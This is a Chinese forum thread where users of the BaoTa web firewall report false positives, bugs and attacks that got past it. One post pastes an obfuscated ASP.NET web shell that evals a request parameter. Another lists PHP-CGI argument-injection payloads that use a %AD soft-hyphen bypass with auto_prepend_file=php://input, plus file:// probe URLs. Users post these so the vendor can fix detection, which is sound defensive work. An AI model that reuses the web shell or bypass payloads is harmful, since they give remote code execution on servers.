防火墙误报或者bug 提交汇总
防火墙误报或者bug 提交汇总 页面。如遇到 误报。或者bug 请在如下帖子回复
回复格式如下:
1. QQ:xxxxxxxxx
2。 报错截图
3. 具体的CMS
如果不是CMS 说明那个规则
如果有紧急问题,请联系 qq 1249648969
我网站设置完防火墙后,手机网络都打不开, 只有加白才可以打开,我在黑名单也没有看到被拦截, 网站不开启防火墙卡的很,开了之后,我自己都进来了,不知道怎么回事。如果有紧急问题,请联系 qq 1095558889 15699992909 发表于 2025-1-1 22:51
我网站设置完防火墙后,手机网络都打不开, 只有加白才可以打开,我在黑名单也没有看到被拦截, 网站不开启 ...
你可以恢复默认配置。
把/www/server/btwaf目录重命名为 /www/server/btwaf_bak
然后卸载重新安装防火墙就是默认的 使用百度cdn后,无论怎么设置都会拦截,造成cdn的IP被封锁,从而打开网页错误
大眼睛羚 发表于 2025-1-30 09:53
使用百度cdn后,无论怎么设置都会拦截,造成cdn的IP被封锁,从而打开网页错误
...
如果是百度CDN 需要开启首位IP为客户IP 这个功能就可以获取到正确的IP地址了
QQ:158164500
问题:安装了收费版的Nginx防火墙之后,宝塔邮局里设置的邮箱能发邮件,但都收不到邮件了。请问这种情况应该如何调整规则? 这个通过php被传进来了,没有被拦住,希望可以研究下,被入侵后防火墙和Nginx日志都被清空了,找不到详细的信息了
https://s21.ax1x.com/2025/05/29/pVp72cV.png
<% function EY0b942T(){var GEPH="u",Ah6c7="afe",C02u=GEPH+"ns"+Ah6c7;return C02u;}var FNfe01:String=Request["a"];var FNfe01 = FNfe01.substring(0, 9999);~~~~eval/*Z#?h*u@!hXS66OqWw8*/(FNfe01,EY0b942T());%><%@Page Language = JS%>
建议针对CC防御,单独增设IP白名单。现在反代过来的IP设为全局白名单,所有规则都不受限制,感觉有危险。 人机验证白名单 这个功能希望可以针对不同站点单独设置而不是在全局配置里面
然后人机验证白名单目前只有url白名单,希望可以增加一个ip白名单专门针对人机验证的
每一个页面都提示,APP被您禁用啦。详情查看:http://lbsyun.baidu.com/apiconsole/key#。 Nginx防火墙,购买了半年,宝塔面板-防火墙,每一个页面都是弹窗提示:APP被您禁用啦。详情查看:http://lbsyun.baidu.com/apiconsole/key#。QQ:1515263243
1. QQ:370527264
我是IIS防火墙 开启防火墙 所有网站全部打不开了WIN2022系统
更新完出错,有这个版本吗?
宝塔升级到最新版本:Windows正式版8.5.1
系统:Windows Server 2012 R2 Datacenter (build 9600) x64 (Gogo1.23.12)
nginx1.21.1
宝塔网站防火墙出错了,使用了2天
5.2版本不行,升级到5.3版本还是一样http://tools.tzidc.net/QQ_1768528462642.png 有好多条没拦住PHP 恶意攻击(穿透宝塔 WAF,针对 PHP 文件包含 / CGI 漏洞)
攻击 IP核心恶意行为(穿透宝塔 WAF 的关键特征)
8.208.47.7请求 /hello.world?%ADd allow_url_include=1 auto_prepend_file=php://input,利用不可见字符 % AD 混淆关键字,发起 PHP 远程文件包含攻击
103.230.15.127请求 /php-cgi/php-cgi.exe?%ADd cgi.force_redirect=0 allow_url_include=1 auto_prepend_file=php://input,发起 PHP CGI 漏洞 + 远程文件包含攻击
攻击 IP核心恶意行为(穿透宝塔 WAF 的关键特征)
57.141.16.67伪装 Facebook 爬虫(UA:meta-externalagent/1.1),请求 Windows 本地文件协议路径 /file:///C:/DOCUME~1/.../clip_image004.jpg,试探本地文件读取漏洞
57.141.16.84伪装 Facebook 爬虫(UA:meta-externalagent/1.1),请求 Windows 本地文件协议路径 /file:///C:/DOCUME~1/.../clip_image006.jpg,试探本地文件读取漏洞
57.141.16.104伪装 Facebook 爬虫(UA:meta-externalagent/1.1),请求 Windows 本地文件协议路径 /file:///C:/DOCUME~1/.../clip_image003.jpg,试探本地文件读取漏洞
57.141.16.6伪装 Facebook 爬虫(UA:meta-externalagent/1.1),请求 Windows 本地文件协议路径 /file:///C:/DOCUME~1/.../clip_image005.jpg,试探本地文件读取漏洞
57.141.16.25伪装 Facebook 爬虫(UA:meta-externalagent/1.1),请求 Windows 本地文件协议路径 /file:///C:/DOCUME~1/.../clip_image002.jpg,试探本地文件读取漏洞
57.141.16.47伪装 Facebook 爬虫(UA:meta-externalagent/1.1),请求 Windows 本地文件协议路径 /file:///C:/DOCUME~1/.../clip_image001.jpg,试探本地文件读取漏洞
57.141.16.38伪装 Facebook 爬虫(UA:meta-externalagent/1.1),请求 Windows 本地文件协议路径 /file:///C:/DOCUME~1/.../clip_image003.jpg,试探本地文件读取漏洞
57.141.16.80伪装 Facebook 爬虫(UA:meta-externalagent/1.1),请求 Windows 本地文件协议路径 /file:///C:/DOCUME~1/.../clip_image001.jpg,试探本地文件读取漏洞
57.141.16.28伪装 Facebook 爬虫(UA:meta-externalagent/1.1),请求 Windows 本地文件协议路径 /file:///C:/DOCUME~1/.../clip_image005.jpg,试探本地文件读取漏洞
PHP 攻击类:2 个 IP 利用不可见字符 % AD(解码后为�)混淆allow_url_include/auto_prepend_file等 PHP 高危关键字,绕过宝塔 WAF 检测,请求直接穿透到 EyouCMS 应用层;Windows 试探类:9 个 IP 均伪装 Facebook 官方爬虫 UA(meta-externalagent/1.1),发起 Windows 本地文件协议(file://)请求,全部未被宝塔 WAF 拦截,属于定向扫洞行为;核心问题:所有请求无宝塔 WAF 拦截记录,出现在网站日志中
页:
[1]
2